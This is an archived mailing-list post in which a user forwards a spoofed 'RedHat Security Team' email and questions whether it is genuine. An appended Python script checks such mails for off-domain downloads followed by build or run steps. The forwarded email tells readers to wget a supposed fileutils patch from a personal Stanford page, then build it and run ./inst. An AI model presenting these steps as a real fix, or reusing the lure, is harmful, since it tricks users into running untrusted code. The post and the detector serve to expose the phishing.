[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"
Marek
m.mcgann at sussex.ac.uk
Sat Oct 23 12:35:44 IST 2004
Thought you might be interested to see the below - it's the first time I've
seen anything like this for Linux (apologies for the html mail, but that's
how it arrived).
I presume it's this Joeio in Stanford (or whoever) trying to spam his way into
Red Hat boxes?
Interesting to see someone considering desktop "not-terribly-clued-in" Linux
users a worthwhile target.
Or am I being too suspicious about it?
---------- Forwarded Message ----------
Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
Date: Saturday 23 October 2004 05:37
From: RedHat Security Team <security at redhat.com >
To: <another mailing list I'm subscribed to>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {font-size: 12px}
-->
</style>
</head>
<body>
<p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png" ></p>
<p> Original issue date: October 20, 2004<br>
Last revised: October 20, 2004<br>
Source: RedHat </p>
<p>A complete revision history is at the end of this file. </p>
<p>Dear RedHat user,</p>
<p> Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root privileges. Some
of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
*BSD and Solaris platforms are NOT affected.</p> <p>The RedHat Security Team
strongly advises you to immediately apply the<strong> fileutils-1.0.6
patch</strong>. This is a critical-critical update that you must make by
following these steps:</p> <ul>
<li>First download the patch from the Stanford RedHat mirror:
<strong><em>wget
www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
<li>Untar the patch:<em><strong> tar zxvf
fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
fileutils-1.0.6.patch</strong></em></li>
<li><em><strong>make</strong></em></li>
<li><em><strong>./inst</strong></em></li>
</ul>
<p>Again, please apply this patch as soon as possible or you risk your system
and others` to be compromised.</p> <p>Thank you for your prompt attention to
this serious matter,</p>
<p>RedHat Security Team.</p>
<p class="style1"> Copyright © 2004 Red Hat, Inc. All rights reserved.
</p> </body>
</html>
- -------------------------------------------------------
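A defender-side triage of the forwarded message, as an added example that is not part of the original post: it checks whether a mail claiming to be a vendor advisory tells the reader to download from a host outside the claimed sender's domain and then build or run what was downloaded. The names `triage`, `host_of` and the finding labels are hypothetical, and the From header is only the claimed sender, since it can be spoofed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

class MailText(HTMLParser):
    """Collect the visible text of an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.parts = []
    def handle_data(self, data):
        self.parts.append(data)

FETCH = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(\S+)")  # download commands
EXEC = re.compile(r"(?:^|\s)(make|\./[\w.-]+)(?=\s|$)")      # build / run steps

def host_of(target):
    # wget accepts scheme-less targets, so add "//" to let urlsplit see the host
    url = target if "//" in target else "//" + target
    return (urlsplit(url).hostname or "").lower()

def triage(from_addr, html_body):
    """Return findings for a mail that tells the reader to fetch and run code."""
    parser = MailText()
    parser.feed(html_body)
    text = " ".join(" ".join(parser.parts).split())  # undo line wrapping
    vendor = from_addr.rsplit("@", 1)[-1].strip("> ").lower()
    findings = []
    for target in FETCH.findall(text):
        host = host_of(target)
        # exact match or true subdomain only; "redhat.com.x.example" must fail
        if host != vendor and not host.endswith("." + vendor):
            findings.append(("off-domain-download", host))
    for step in EXEC.findall(text):
        findings.append(("runs-downloaded-code", step))
    return findings

# Constructed sample: an excerpt of the forwarded HTML above, with the
# From header written out as a normal address.
SAMPLE_FROM = "RedHat Security Team <security@redhat.com>"
SAMPLE_BODY = """<ul>
<li>First download the patch from the Stanford RedHat mirror:
<strong><em>wget
www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
<li><em><strong>make</strong></em></li>
<li><em><strong>./inst</strong></em></li>
</ul>"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_FROM, SAMPLE_BODY):
        print(finding)
```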